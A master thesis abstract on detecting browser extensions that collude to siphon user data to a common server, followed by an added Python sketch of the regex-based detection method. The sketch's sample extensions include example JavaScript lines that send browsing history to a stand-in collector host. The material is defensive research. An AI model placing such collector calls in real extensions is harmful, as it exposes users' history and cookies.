Collusion Attacks on Browser Extensions: Revealing hidden extensions colluding against the user

Type

Master Thesis

Abstract

Browser extensions have been created to extend and enhance web browsers in order to improve the user experience. Because of this, browser extensions can access a range of different resources, which poses a great privacy risk for users. These sensitive resources include users’ browser history, passwords and banking information. Browser extensions have therefore become a great source of interest for those with malicious intent. In order to obscure the intent behind a browser extension, a set of extensions can be created that, when analysed individually, do not raise any suspicion. However, by analysing the entire set of extensions, a relationship between the extensions can be revealed. Namely, each extension is extracting user information under different sets of permissions, and relaying this data to a common external server. Such extensions are said to be colluding, and possibly performing a collusion attack. This form of attack is the focus of this research paper. We propose a method for downloading browser extensions and performing static analysis of the collected extensions. The static analysis is based on regular expressions defined to match and extract domain names and IP addresses from the downloaded browser extensions. In order to discover domains or IP addresses that are malicious, Recorded Future’s threat intelligence is used to provide a classification and the information behind each classification. Recorded Future collects data from technical sources, open sources and closed sources. By combining machine learning and natural language processing, Recorded Future can identify, classify and predict events. In this work, over 250,000 Mozilla Firefox and Google Chrome extensions have been analysed by our proposed method and, as a result, 1037 browser extensions have been found to be possibly colluding. Recorded Future classified 131 domains as Malicious.
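The static-analysis step described in the abstract can be sketched as follows. This is an added example, not code from the thesis: the regular expressions, the function names and the sample extensions are assumptions constructed here, and the threat-intelligence classification step is left out.

```python
import ipaddress
import json
import re
from collections import defaultdict

# Hostnames inside http(s)/ws(s) URLs, and bare dotted-quad IPv4 literals.
URL_HOST_RE = re.compile(r"\b(?:https?|wss?)://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

def extract_endpoints(text):
    """Return the lower-cased hostnames and valid IPv4 addresses found in text."""
    found = {h.lower().rstrip(".") for h in URL_HOST_RE.findall(text)}
    for candidate in IPV4_RE.findall(text):
        try:
            found.add(str(ipaddress.IPv4Address(candidate)))
        except ValueError:
            pass  # out-of-range octets; four-part version strings still match
    return found

def shared_endpoints(extensions, min_extensions=2, ignore=frozenset()):
    """Map every endpoint referenced by >= min_extensions extensions to
    {extension_id: permissions}, so differing permission sets are visible."""
    by_endpoint = defaultdict(dict)
    for ext_id, files in extensions.items():
        manifest = json.loads(files.get("manifest.json", "{}"))
        perms = sorted(p for p in manifest.get("permissions", []) if isinstance(p, str))
        for text in files.values():
            for endpoint in extract_endpoints(text) - ignore:
                by_endpoint[endpoint][ext_id] = perms
    return {ep: exts for ep, exts in by_endpoint.items() if len(exts) >= min_extensions}

# Constructed sample: three unpacked extensions as {file name: file content}.
SAMPLE = {
    "ext-history": {
        "manifest.json": '{"name": "Tab Tidy", "version": "1.0", "permissions": ["history"]}',
        "bg.js": 'fetch("https://collector.example.net/h", {method: "POST", body: h});',
    },
    "ext-cookies": {
        "manifest.json": '{"name": "Dark Theme", "version": "2.1", "permissions": ["cookies"]}',
        "bg.js": 'new WebSocket("wss://collector.example.net/c"); var alt = "203.0.113.7";',
    },
    "ext-benign": {
        "manifest.json": '{"name": "Clock", "version": "0.3", "permissions": []}',
        "popup.js": 'fetch("https://time.example.org/now"); var bad = "999.1.1.1";',
    },
}

if __name__ == "__main__":
    for endpoint, exts in shared_endpoints(SAMPLE).items():
        print(endpoint, exts)
```

The `ignore` parameter is there for endpoints that many unrelated extensions reference legitimately (update servers, common CDNs), which would otherwise dominate the shared-endpoint list.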

Keywords

Computer and Information Science
